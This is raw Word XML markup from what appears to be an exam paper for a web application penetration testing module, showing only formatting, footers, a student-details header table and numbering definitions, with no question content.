            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6929D8C5" wp14:editId="056DFF92">
                  <wp:extent cx="5731510" cy="2948305"/>
                  <wp:effectExtent l="0" t="0" r="254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25888" w14:textId="77777777" w:rsidR="005034AE" w:rsidRDefault="005034AE" w:rsidP="00C309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313952" w14:textId="6F46CFE0" w:rsidR="00786EF4" w:rsidRDefault="00786EF4" w:rsidP="00C309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A1BBE4" wp14:editId="79B1C283">
                  <wp:extent cx="5731510" cy="1593850"/>
                  <wp:effectExtent l="0" t="0" r="254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9648A" w14:textId="77777777" w:rsidR="000D0EBB" w:rsidRDefault="000D0EBB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1BC456" w14:textId="77777777" w:rsidR="005C1D0C" w:rsidRDefault="005C1D0C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3EA107" w14:textId="77777777" w:rsidR="000A32FD" w:rsidRDefault="000A32FD" w:rsidP="00C309E7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2"/>
    <w:bookmarkEnd w:id="3"/>
    <w:bookmarkEnd w:id="4"/>
    <w:bookmarkEnd w:id="5"/>
    <w:p w14:paraId="695D1A80" w14:textId="47311FAB" w:rsidR="00943019" w:rsidRPr="000E55BF" w:rsidRDefault="00943019" w:rsidP="000E55BF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 END OF PAPER--</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00943019" w:rsidRPr="000E55BF" w:rsidSect="001B46D5">
      <w:headerReference w:type="default" r:id="rId4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12D2" w14:textId="77777777" w:rsidR="005557FC" w:rsidRDefault="005557FC" w:rsidP="00091F75">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1AEB0182" w14:textId="77777777" w:rsidR="005557FC" w:rsidRDefault="005557FC" w:rsidP="0009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D8C3" w14:textId="77777777" w:rsidR="006008A9" w:rsidRDefault="00600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9F136" w14:textId="469EC884" w:rsidR="00B35CAA" w:rsidRPr="00621525" w:rsidRDefault="00B35CAA">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:sz w:val="24"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:t>WAPT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 (</w:t>
    </w:r>
    <w:r w:rsidR="00BD2EB9">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:t>C</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:t>SF</w:t>
    </w:r>
    <w:r w:rsidRPr="001A4122">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:t xml:space="preserve">) </w:t>
    </w:r>
    <w:r w:rsidRPr="001A4122">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:tab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- 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begin"/>
    </w:r>
    <w:r w:rsidRPr="00621525">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrTex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separate"/>
    </w:r>
    <w:r w:rsidR="00D572DA">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:noProof/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:t>13</w:t>
    </w:r>
    <w:r w:rsidRPr="00621525">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/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-</w:t>
    </w:r>
    <w:r w:rsidRPr="00621525">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:tab/>
      <w:t>AY</w:t>
    </w:r>
    <w:r w:rsidR="00BD2EB9">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="FF0000"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r w:rsidR="00287532">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="FF0000"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="FF0000"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:t>/</w:t>
    </w:r>
    <w:r w:rsidR="00963172">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="FF0000"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r w:rsidR="00287532">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="FF0000"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r w:rsidRPr="00621525">
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:t xml:space="preserve"> Sem </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        <w:color w:val="000000"/>
        <w:sz w:val="20"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG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4BD65" w14:textId="77777777" w:rsidR="00B35CAA" w:rsidRDefault="00B35CAA">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Helv" w:hAnsi="Helv" w:cs="Helv"/>
        <w:color w:val="000000"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:t>Module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</w:t>
    </w:r>
    <w:proofErr w:type="gramStart"/>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Helv" w:hAnsi="Helv" w:cs="Helv"/>
        <w:color w:val="000000"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:t>abbrv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</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Helv" w:hAnsi="Helv" w:cs="Helv"/>
        <w:color w:val="000000"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:tab/>
    </w:r>
    <w:proofErr w:type="gramEnd"/>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Helv" w:hAnsi="Helv" w:cs="Helv"/>
        <w:color w:val="000000"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:t xml:space="preserve">- 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begin"/>
    </w:r>
    <w:r w:rsidRPr="006904F1">
      <w:rPr>
        <w:rFonts w:ascii="Helv" w:hAnsi="Helv" w:cs="Helv"/>
        <w:color w:val="000000"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrTex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separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Helv" w:hAnsi="Helv" w:cs="Helv"/>
        <w:noProof/>
        <w:color w:val="000000"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r w:rsidRPr="006904F1">
      <w:rPr>
        <w:rFonts w:ascii="Helv" w:hAnsi="Helv" w:cs="Helv"/>
        <w:color w:val="000000"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Helv" w:hAnsi="Helv" w:cs="Helv"/>
        <w:color w:val="000000"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:t xml:space="preserve"> -</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Helv" w:hAnsi="Helv" w:cs="Helv"/>
        <w:color w:val="000000"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:tab/>
      <w:t>AY</w:t>
    </w:r>
    <w:r w:rsidRPr="002811EC">
      <w:rPr>
        <w:rFonts w:ascii="Helv" w:hAnsi="Helv" w:cs="Helv"/>
        <w:color w:val="FF0000"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:t>13/14</w:t>
    </w:r>
    <w:r w:rsidRPr="006904F1">
      <w:rPr>
        <w:rFonts w:ascii="Helv" w:hAnsi="Helv" w:cs="Helv"/>
        <w:color w:val="000000"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:t xml:space="preserve">  Sem</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Helv" w:hAnsi="Helv" w:cs="Helv"/>
        <w:color w:val="000000"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:t xml:space="preserve">  </w:t>
    </w:r>
    <w:r w:rsidRPr="002811EC">
      <w:rPr>
        <w:rFonts w:ascii="Helv" w:hAnsi="Helv" w:cs="Helv"/>
        <w:color w:val="FF0000"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-SG"/>
      </w:rPr>
      <w:t>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A5CF" w14:textId="77777777" w:rsidR="005557FC" w:rsidRDefault="005557FC" w:rsidP="00091F75">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="013F25A6" w14:textId="77777777" w:rsidR="005557FC" w:rsidRDefault="005557FC" w:rsidP="00091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6646" w14:textId="77777777" w:rsidR="006008A9" w:rsidRDefault="00600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6BAC" w14:textId="494F8791" w:rsidR="00841274" w:rsidRDefault="00237409" w:rsidP="00D80E05">
    <w:pPr>
      <w:pStyle w:val="Header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6C2FFA" wp14:editId="6DE9AAD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1" name="MSIPCM128d482ca86a2927da9426b7" descr="{&quot;HashCode&quot;:-104532547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C02A4D0" w14:textId="05C8B18D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C2FFA" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="MSIPCM128d482ca86a2927da9426b7" o:spid="_x0000_s1026" type="#_x0000_t202" alt="{&quot;HashCode&quot;:-1045325475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2C02A4D0" w14:textId="05C8B18D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35CAA">
      <w:rPr>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t xml:space="preserve">Last Update: </w:t>
    </w:r>
    <w:r w:rsidR="00454057">
      <w:rPr>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t>15</w:t>
    </w:r>
    <w:r w:rsidR="00B35CAA">
      <w:rPr>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t>/</w:t>
    </w:r>
    <w:r w:rsidR="00CC6FFB">
      <w:rPr>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t>12</w:t>
    </w:r>
    <w:r w:rsidR="00B35CAA">
      <w:rPr>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t>/20</w:t>
    </w:r>
    <w:r w:rsidR="00841274">
      <w:rPr>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r w:rsidR="00454057">
      <w:rPr>
        <w:sz w:val="20"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="4E71CD53" w14:textId="77777777" w:rsidR="00B35CAA" w:rsidRPr="00D80E05" w:rsidRDefault="00B35CAA" w:rsidP="00D80E05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3060"/>
    </w:tblGrid>
    <w:tr w:rsidR="00B35CAA" w:rsidRPr="00487BD5" w14:paraId="6BE10397" w14:textId="77777777" w:rsidTr="000D11AF">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="5688" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="09F85B44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umber: </w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3060" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="17D1EF96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Seat Number:</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
    <w:tr w:rsidR="00B35CAA" w:rsidRPr="00487BD5" w14:paraId="1A2DD76A" w14:textId="77777777" w:rsidTr="000D11AF">
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="5688" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="3253973E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 xml:space="preserve">Student Name: </w:t>
          </w:r>
        </w:p>
      </w:tc>
      <w:tc>
        <w:tcPr>
          <w:tcW w:w="3060" w:type="dxa"/>
        </w:tcPr>
        <w:p w14:paraId="4BDDE1D7" w14:textId="77777777" w:rsidR="00B35CAA" w:rsidRPr="00487BD5" w:rsidRDefault="00B35CAA" w:rsidP="00091F75">
          <w:pPr>
            <w:pStyle w:val="Header"/>
            <w:spacing w:before="120" w:after="120"/>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00487BD5">
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:b/>
            </w:rPr>
            <w:t>Module Group:</w:t>
          </w:r>
        </w:p>
      </w:tc>
    </w:tr>
  </w:tbl>
  <w:p w14:paraId="6BADBCF8" w14:textId="77777777" w:rsidR="00B35CAA" w:rsidRDefault="00B35C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B640" w14:textId="638C5FD3" w:rsidR="00B35CAA" w:rsidRDefault="002374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B4507EF" wp14:editId="086B05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6" name="MSIPCM98bb4a3492999ab45ba34982" descr="{&quot;HashCode&quot;:-1045325475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5696B9" w14:textId="4E3BB707" w:rsidR="00237409" w:rsidRPr="00841274" w:rsidRDefault="00841274" w:rsidP="008412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841274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Op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507EF" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="MSIPCM98bb4a3492999ab45ba34982" o:spid="_x0000_s1027" type="#_x0000_t202" alt="{&quot;HashCode&quot;:-1045325475,&quot;Height&quot;:841.0,&quot;Width&quot;:595.0,&quot;Placement&quot;:&quot;Header&quot;,&quot;Index&quot;:&quot;Primary&quot;,&quot;Section&quot;:2,&quot;Top&quot;:0.0,&quot;Left&quot;:0.0}" style="position:absolute;margin-left:0;margin-top:15pt;width:595.3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175696B9" w14:textId="4E3BB707" w:rsidR="00237409" w:rsidRPr="00841274" w:rsidRDefault="00841274" w:rsidP="00841274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841274">
                      <w:rPr>
                        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                        <w:color w:val="000000"/>
                      </w:rPr>
                      <w:t xml:space="preserve">                    Official Op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3AE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5A9ED9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51A1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6B5E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A1D62DD6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704CA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20D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F0DCEA94"/>
    <w:lvl w:ilvl="0" w:tplc="E3C49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0070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37F2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FC40E350"/>
    <w:lvl w:ilvl="0" w:tplc="9410D8D4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56CA5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="73B68CF6"/>
    <w:lvl w:ilvl="0" w:tplc="608E81AE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F25CD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9F15AB4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21EFF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0149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E1257"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="85E42620"/>
    <w:lvl w:ilvl="0" w:tplc="6E30AD98">
      <w:start w:val="2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B710B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8B9A34E4"/>
    <w:lvl w:ilvl="0" w:tplc="E8769D4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726276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7308DE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D386784C"/>
    <w:lvl w:ilvl="0" w:tplc="1844556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EA390E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1298C602"/>
    <w:lvl w:ilvl="0" w:tplc="2BA8190C">
      <w:start w:val="2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4D0E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8FE4C83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CEEAA68">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="(%2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2" w:tplc="04090013">
      <w:start w:val="1"/>
      <w:numFmt w:val="upp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23289C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E042E4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BCEEAA68">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="(%2)"/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="108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9A0E9F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CADE2DA8"/>
    <w:lvl w:ilvl="0" w:tplc="5E3EDB4E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45FD9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C87EE5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A74FC8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236D2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0212B4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C3EF5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D7067F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B36EF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6F5A5B30"/>
    <w:lvl w:ilvl="0" w:tplc="76088B1C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05CB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F2EE3FDC"/>
    <w:lvl w:ilvl="0" w:tplc="E3C49464">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter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3199A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AEC2C708"/>
    <w:lvl w:ilvl="0" w:tplc="A28EAFE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1295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C2480"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1A2C603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AFB2ABC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C31E6E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C4085"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6F5A5B30"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="center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C3A16"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D8549698"/>
    <w:lvl w:ilvl="0" w:tplc="C3E6D05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9D30F1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7155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C4E19"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A96405D0"/>
    <w:lvl w:ilvl="0" w:tplc="BCEEAA68">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="righ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21C7D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38871AE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1A2C603E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 w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="745417C8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B0AE70E4"/>
    <w:lvl w:ilvl="0" w:tplc="4392A37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737BEF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A167F3E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="998AD3FE"/>
    <w:lvl w:ilvl="0" w:tplc="1A102DD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807B6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3794B640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27171"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A808E47C"/>
    <w:lvl w:ilvl="0" w:tplc="4F10A4E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DD3580"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="425AEB9C"/>
    <w:lvl w:ilvl="0" w:tplc="51C41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56A67"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4C20F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9246DB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="19949D2A"/>
    <w:lvl w:ilvl="0" w:tplc="2FA89A9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A4652"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4DC0410E"/>
    <w:lvl w:ilvl="0" w:tplc="217E271A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4445">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2042775390">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1102186705">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1646349266">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1740128357">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="876046855">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="72822899">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="144321550">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1973248942">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="228659540">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="617032767">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="895818778">
    <w:abstractNumId w:val="38"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="2028090907">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="529421632">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="255598381">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="25565571">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="2049648624">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="94786988">
    <w:abstractNumId w:val="42"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1153791267">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1455833580">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="210775391">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="261958923">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="705789902">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="945577746">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="501238512">
    <w:abstractNumId w:val="39"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="230771539">
    <w:abstractNumId w:val="37"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="513421621">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1821266485">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1384601697">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1677003155">
    <w:abstractNumId w:val="44"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="219945186">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1152526684">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="876889753">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="1544171535">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="1641959872">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="36" w16cid:durableId="214245375">
    <w:abstractNumId w:val="36"/>
  </w:num>
  <w:num w:numId="37" w16cid:durableId="233592411">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="38" w16cid:durableId="1667174816">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="39" w16cid:durableId="1981380691">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="40" w16cid:durableId="1296567862">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="41" w16cid:durableId="2050451951">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="42" w16cid:durableId="1107656430">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="43" w16cid:durableId="855652482">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="44" w16cid:durableId="199515615">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="45" w16cid:durableId="1046638997">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="46" w16cid:durableId="1338270629">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="47" w16cid:durableId="1414275934">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="48" w16cid:durableId="165055437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75"/>
    <w:rsid w:val="00000276"/>
    <w:rsid w:val="00000922"/>
    <w:rsid w:val="0000297D"/>
    <w:rsid w:val="000031DC"/>
    <w:rsid w:val="00003D29"/>
    <w:rsid w:val="00003ED0"/>
    <w:rsid w:val="00003F3B"/>
    <w:rsid w:val="00003FD8"/>
    <w:rsid w:val="00004570"/>
    <w:rsid w:val="0000671C"/>
    <w:rsid w:val="00006854"/>
    <w:rsid w:val="000069ED"/>
    <w:rsid w:val="00006DD3"/>
    <w:rsid w:val="00010DA6"/>
    <w:rsid w:val="00011955"/>
    <w:rsid w:val="00012A8C"/>
    <w:rsid w:val="000133F5"/>
    <w:rsid w:val="00013A84"/>
    <w:rsid w:val="00016F6C"/>
    <w:rsid w:val="0001752C"/>
    <w:rsid w:val="00020AC7"/>
    <w:rsid w:val="00021129"/>
    <w:rsid w:val="000212D3"/>
    <w:rsid w:val="00021459"/>
    <w:rsid w:val="00021FE1"/>
    <w:rsid w:val="0002270F"/>
    <w:rsid w:val="000239B9"/>
    <w:rsid w:val="00023A19"/>
    <w:rsid w:val="00023A1A"/>
    <w:rsid w:val="000240BE"/>
    <w:rsid w:val="000242FF"/>
    <w:rsid w:val="000246F4"/>
    <w:rsid w:val="0002502E"/>
    <w:rsid w:val="000256DA"/>
    <w:rsid w:val="000256F2"/>
    <w:rsid w:val="00025803"/>
    <w:rsid w:val="00026757"/>
    <w:rsid w:val="00026F90"/>
    <w:rsid w:val="0002762C"/>
